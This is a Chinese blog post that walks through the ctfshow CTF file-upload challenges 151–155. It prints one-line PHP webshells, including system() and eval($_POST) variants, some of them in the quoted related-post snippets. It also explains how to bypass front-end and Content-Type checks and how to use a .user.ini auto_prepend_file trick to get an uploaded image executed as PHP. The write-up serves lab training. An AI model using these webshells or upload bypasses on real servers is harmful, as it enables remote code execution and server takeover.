ctfshow [web] 文件上传 151--155

最新推荐文章于 2024-03-04 23:28:27 发布
最新推荐文章于 2024-03-04 23:28:27 发布
阅读量441 收藏
点赞数
分类专栏: CTF 文章标签: 前端 php 开发语言 Powered by 金山文档
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_68906365/article/details/129095462
版权

Web 151

提示前端校验不可靠,因此需要绕过前端校验。

可以写一个一句话木马,然后把后缀改成png上传。

想要绕过前端校验的话,可以用Burpsuite抓包然后修改filename的后缀为php,这样上传成功访问对应页面就可以拿到flag了。

一句话木马:

GIF89a
<?= system('cat ../fla*')?>

发送之后返回:

访问/upload/new,php,在注释里找到了flag。

Web 152

提示后端校验要严密,说明存在后端校验。

看题解貌似是限制了Content-Type,即文件类型,只能为 image/png,不过因为是先上传图片再修改后缀,所以上题的方法仍然适用

Web 153

采用上一题的手法发现文件上传失败,可能是后端ban掉了php后缀。

这里需要用到一个新方法:

.user.ini

原理: 指定一个文件(如a.jpg),那么该文件就会被包含在要执行的php文件中(如index.php),类似于在index.php中插入一句:require(./a.jpg);
这两个设置的区别只是在于auto_prepend_file是在文件前插入;
auto_append_file在文件最后插入(当文件调用的有exit()时该设置无效)所以要求当前目录必须要有php文件,巧合的是这题upload目录下有个index.php所以这种方式是可以成功的。 

.user.ini

GIF89a                  
auto_prepend_file=new.png

先上传 .user.ini 文件,然后上传new.png就行了。

访问/upload,在注释里找到flag。

Web 154

仍然可以通过上传 .user.ini 文件来绕过后端校验,上题手法依然可以使用。

Web 155

仍然可以通过上传 .user.ini 文件来绕过后端校验,上题手法依然可以使用。

总结:

  1. 前端校验可以通过抓包后修改后缀来绕过

  1. 后端校验关键点一:Content_Type

  1. 后端校验绕过方法一:利用.user.ini文件把写有木马的图片加入到php文件解析序列中去(前提是目录下有可以执行的php文件,如index.php)

D2490
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CTFshow-菜狗杯-WEB-变量循环取值-我的眼里只有$
03-04
CTFshow-菜狗杯-WEB-变量循环取值-我的眼里只有$
CTFshow 文件上传 web151
Kradress的博客
02-13 190
目录源码思路题解总结 源码 <script> layui.use('upload', function(){ var upload = layui.upload; //执行实例 var uploadInst = upload.render({ elem: '#upload' //绑定元素 ,url: '/upload/' //上传接口 ,done: function(res){ if(res.code==0){ $("#resu
ctfshow web151-161(文件上传一)
最新发布
m0_74057302的博客
03-04 1160
我这一生如履薄冰,你说我还能到对岸吗???
ctfshow-web155(文件上传)
m0_62094846的博客
01-18 310
这题和上题差不多,上传正常png文件可以,带木马的就不行,然后就更换短标签一个个试 <?= eval($_POST[1]);?> 然后后缀换成php又不行了,更换大写又不能连接蚁剑 又用.user.ini,再上传1.png文件,在/upload/index.php下可以读取 ...
CTFshow 文件上传 web155
Kradress的博客
02-15 1476
目录思路总结 思路 其他和上题一样,发现这次不能通过改变大小写来绕过了,可以用短标签 shell.png <? echo 123;eval($_POST['cmd']); ?> .user.ini auto_prepend_file=shell.png 访问upload,执行rce 总结 …
ctfshow文件上传web151
m0_62584974的博客
04-05 1132
2022/4/5 先写一个一句话木马文件 <?php eval($_POST[1]); ?> 试着上传php木马文件 上传失败 查看源码发现只能上传png文件 把它改成php 上传我们刚刚写的木马文件 访问我们刚刚上传的文件 利用Hackbar用post的方式提交 1=system("ls /"); 没有发现flag的文件 查看上一层的目录用post的形式提交 1=system("ls ../"); 发现...
ctfshow—web151-160
akxnxbshai的博客
02-04 1903
目录 Web 151-152 Web 153 Web 154 Web 155 Web 156 Web 157-159 Web 160 Web 151-152 直接上传文件,然后抓包改后缀 再用蚁剑连一下,找到flag即可 Web 153 php文件无法上传。 发现服务器是nginx,考点是上传.user.ini配置文件,upload文件夹自带一个index.php,使其预加载木马 先后上传文件.user.ini和1.txt(注意抓包改名称) 两个上传后访问/uplo
CTFSHOW 文件上传 151-170
Landasika的博客
05-17 487
预备知识 1、一句话木马: php:<?php @eval($_post['pass']);?> asp:<%eval request ("pass")%> aspx:<%@ Page Language="Jscript"%> <%eval(Request.Item["pass"],"unsafe");%> phtml:GIF89a? ...
ctfshow-VIP题目-Web-详细解题思路
01-27
ctfshow-VIP题目-Web-详细解题思路
ctfshow-web41~60-WP
02-21
ctfshow-web41~60-WPctfshow-web41~60-WP
ctfshow web223-group盲注无数字
10-21
ctfshow web223-group盲注无数字
CTFSHOW web193 left标注盲注脚本
05-04
这段代码是一个用于获取某个网站的 flag 的脚本。它使用了 SQL 注入漏洞来获取 flag。具体来说,它通过构造 SQL 语句的方式,逐个字符地获取 flag。其中,它通过修改注入语句中的 payload 变量,来获取不同的信息,...
CTFSHOW文件上传151-170
qq_68233961的博客
02-26 674
CTFshow文件上传
【ctfshow】文件上传web151-170wp
weixin_51614272的博客
02-26 1584
文件上传web151-170web1511.编写一句话木马上传2.修改前端验证3.在蚁剑上找flagweb1521.修改前端验证2.burp抓包后修改MIME3.在蚁剑上找flagweb1531.修改前端验证2.上传ini配置文件3.上传1.txt文件4.在蚁剑上找flagweb154 web155 web156 web157 web1581.修改前端验证2.上传ini配置文件3.上传1.txt文件4.在蚁剑上找flagweb159日志包含漏洞web160 web151 1.编写一句话木马上传 发现前端
CTFshow web入门——文件上传
小元砸的博客
03-14 9875
Web 151
CTFshow_Web_文件上传——web151~web170
Ho1aAs‘s Blog
04-26 2302
文章目录工具题解Web 151~152Web 153Web 154Web 155Web 156Web 157~158Web 159Web 160Web 161Web 162Web 163Web 164Web 165Web 166Web 167Web 168~170完 工具 Burpsuite php 题解 Web 151~152 页面上,伪装成jpg的一句话木马无法上传,提示前后端验证 抓包,修改filename为xxx.php,MIME类型image/png 读取flag直接用通配符 # 151.ph
CTFSHOW系列-web151(文件上传-js前端验证)
siu~
12-07 600
CTFSHOW系列解题思路
CTFshow之web151~160---文件上传(上)
金 帛的博客
06-02 1582
ctfshow的wp
ctfshow-web-web红包题
07-14
如果存在文件上传漏洞,我们可以尝试上传一个特殊设计的恶意文件,以执行任意命令或获取服务器上的文件。 综上所述,ctfshow-web-web红包题需要我们深入分析网页代码,发现可能存在的漏洞,并利用这些漏洞获取红包...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值